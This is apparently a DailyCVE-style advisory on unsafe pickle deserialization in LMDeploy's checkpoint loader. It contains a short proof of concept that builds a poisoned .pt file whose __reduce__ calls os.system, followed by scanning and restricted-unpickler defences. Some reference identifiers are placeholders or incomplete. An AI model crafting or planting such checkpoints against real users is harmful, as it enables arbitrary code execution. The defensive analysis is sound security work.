The CVE-2025-XXXX vulnerability in LMDeploy (versions up to and including 0.7.1) stems from improper input validation in the `load_weight_ckpt` function in lmdeploy/lmdeploy/vl/model/utils.py. The function hands PT (PyTorch) checkpoint files to the pickle-based loader without restricting what the pickle stream may reference, so a malicious checkpoint triggers unsafe deserialization and can lead to arbitrary code execution. An attacker crafts a poisoned PT file whose pickle stream names a callable such as `os.system` together with the arguments to pass to it; when LMDeploy's weight-loading path deserializes the file, the unpickler imports that callable and invokes it in the context of the application before any weights are returned. Exploitation requires local access or tricking a user into loading the malicious file.
DailyCVE Form:
Platform: LMDeploy
Version: <= 0.7.1
Vulnerability: Unsafe Deserialization
Severity: Moderate
Date: 2025-04-04
What Undercode Say:
Exploitation:
- Craft a malicious PT file with PyTorch's `torch.save()`. The object's `__reduce__` tells the unpickler which callable to invoke, so the command runs at load time, not at save time:
    import os
    import torch

    class Exploit:
        def __reduce__(self):
            # Executed by pickle when the checkpoint is deserialized
            return (os.system, ('malicious-command',))

    # The object itself must be placed in the checkpoint; a pre-pickled
    # bytes payload would be restored as inert bytes and never executed.
    torch.save({'weights': Exploit()}, 'exploit.pt')
- Place the file where LMDeploy's weight loader will read it (for example as the checkpoint a user is asked to load); the payload fires as soon as `load_weight_ckpt` deserializes it.
Detection & Mitigation:
1. Check for vulnerable versions:
pip show lmdeploy | grep Version
2. Patch: Upgrade to LMDeploy > 0.7.1.
- Sanitize inputs: only accept PT files from trusted sources and verify their checksums (or signatures) before loading.
- Pre-load scanning: inspect checkpoints with `fickling` (a pickle analyzer with PyTorch support) before they reach the loader. A `.pt` file written by current PyTorch releases is a zip archive whose pickle stream is `data.pkl`; fickling's CLI takes a raw pickle stream:
    unzip -p exploit.pt '*/data.pkl' > exploit.pkl
    fickling --check-safety exploit.pkl
- Safe loading: where only tensors are needed, load with `torch.load(path, weights_only=True)`, which restricts the unpickler to an allowlist of globals and therefore never resolves `os.system`; this is the default from PyTorch 2.6 onward.
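The following is an added example that accompanies both the exploitation steps and the detection and mitigation steps above; it is not LMDeploy's code, nor fickling's. It builds a stand-in for a malicious checkpoint with the same layout `torch.save()` produces (a zip archive with the pickle at `<prefix>/data.pkl`, tensor storages omitted, which is an assumption of the example), shows that an unrestricted load executes the attacker's callable, then demonstrates the two defences a practitioner wants: a static opcode scan that lists every global the stream imports without executing anything, and a hardened loader that refuses any global outside an allowlist, which is the mechanism behind `weights_only=True`. `os.getenv` stands in for `os.system` so the demo is harmless; the `SAFE_GLOBALS` allowlist is hypothetical and far smaller than PyTorch's own.

```python
import collections
import io
import os
import pickle
import pickletools
import zipfile

# Hypothetical allowlist of globals a weights-only loader needs. PyTorch's
# weights_only mode keeps a much longer list; this one is just for the demo.
SAFE_GLOBALS = {("collections", "OrderedDict")}


class Exploit:
    """Pickle payload: __reduce__ names the callable the unpickler will invoke.
    os.getenv keeps the demo harmless; os.system with a shell command behaves
    identically, which is the bug the advisory describes."""

    def __reduce__(self):
        return (os.getenv, ("LMDEPLOY_POC_MARKER", "executed-during-unpickle"))


def build_pt(obj, record_prefix="ckpt"):
    """Constructed stand-in for a torch.save() checkpoint: a zip archive holding
    the pickled object at <prefix>/data.pkl (tensor storages omitted)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(f"{record_prefix}/data.pkl", pickle.dumps(obj, protocol=2))
    return buf.getvalue()


def build_malicious_pt():
    return build_pt({"weights": Exploit()})


def build_benign_pt():
    # Constructed benign state dict: only references collections.OrderedDict.
    return build_pt(collections.OrderedDict([("layer.weight", [0.1, 0.2])]))


def extract_pickle(pt_bytes):
    """Return the data.pkl stream from a zip-format checkpoint."""
    with zipfile.ZipFile(io.BytesIO(pt_bytes)) as zf:
        name = next(n for n in zf.namelist() if n.endswith("/data.pkl"))
        return zf.read(name)


def vulnerable_load(pt_bytes):
    """What an unrestricted pickle.load / torch.load does: every GLOBAL in the
    stream is imported and every REDUCE calls the referenced object."""
    return pickle.loads(extract_pickle(pt_bytes))


def scan_pickle(pickle_bytes):
    """Static scan, nothing is executed: collect the (module, name) pairs the
    stream imports and the byte offsets of REDUCE opcodes (callable invocations).
    REDUCE also appears in benign streams; the verdict comes from the globals."""
    globals_seen, reduces, recent_strings = [], [], []
    for op, arg, pos in pickletools.genops(pickle_bytes):
        if op.name == "GLOBAL":            # protocol <= 3: arg is "module name"
            module, name = arg.split(" ", 1)
            globals_seen.append((module, name))
        elif op.name == "STACK_GLOBAL":    # protocol 4+: module and name were pushed as strings
            globals_seen.append(tuple(recent_strings[-2:]))
        elif op.name == "REDUCE":
            reduces.append(pos)
        if isinstance(arg, str):
            recent_strings.append(arg)
    return globals_seen, reduces


def is_safe_checkpoint(pt_bytes, allowed=SAFE_GLOBALS):
    """Pre-load check: reject a checkpoint that references any global outside the allowlist."""
    globals_seen, _ = scan_pickle(extract_pickle(pt_bytes))
    return all(g in allowed for g in globals_seen)


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened loader: find_class is the hook pickle uses to resolve GLOBAL, so
    denying it here stops os.system before REDUCE can call it."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def hardened_load(pt_bytes):
    return RestrictedUnpickler(io.BytesIO(extract_pickle(pt_bytes))).load()


def try_hardened_load(pt_bytes):
    """Return ("loaded", obj) or ("blocked", reason) so callers can act on the outcome."""
    try:
        return ("loaded", hardened_load(pt_bytes))
    except pickle.UnpicklingError as exc:
        return ("blocked", str(exc))


if __name__ == "__main__":
    for label, pt in (("benign", build_benign_pt()), ("malicious", build_malicious_pt())):
        globals_seen, reduces = scan_pickle(extract_pickle(pt))
        print(label, "globals:", globals_seen, "REDUCE at:", reduces,
              "safe:", is_safe_checkpoint(pt), "hardened:", try_hardened_load(pt))
    # vulnerable_load(build_malicious_pt()) runs the payload and returns
    # {'weights': 'executed-during-unpickle'}; with os.system it would have run a command.
```

The scan and the restricted unpickler answer the same question from two sides: the scanner reports `('os', 'getenv')` for the malicious file and only `('collections', 'OrderedDict')` for the benign one, and the loader blocks the former at `find_class` while returning the state dict for the latter. Either check belongs in front of `torch.load` in any code path that accepts checkpoints from outside the trust boundary.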
Analytics:
- Attack Vector: Local (user-assisted)
- CVSS: 6.5 (Medium)
- Exploit Availability: Public PoC expected.
References:
- GitHub Advisory: GHSA-xxxx-xxxx-xxxx
- NVD: CVE-2025-XXXX
- Patch Commit: InternLM/lmdeploy@
- Reported By: https://github.com/advisories/GHSA-7vc5-mjwp-c8fq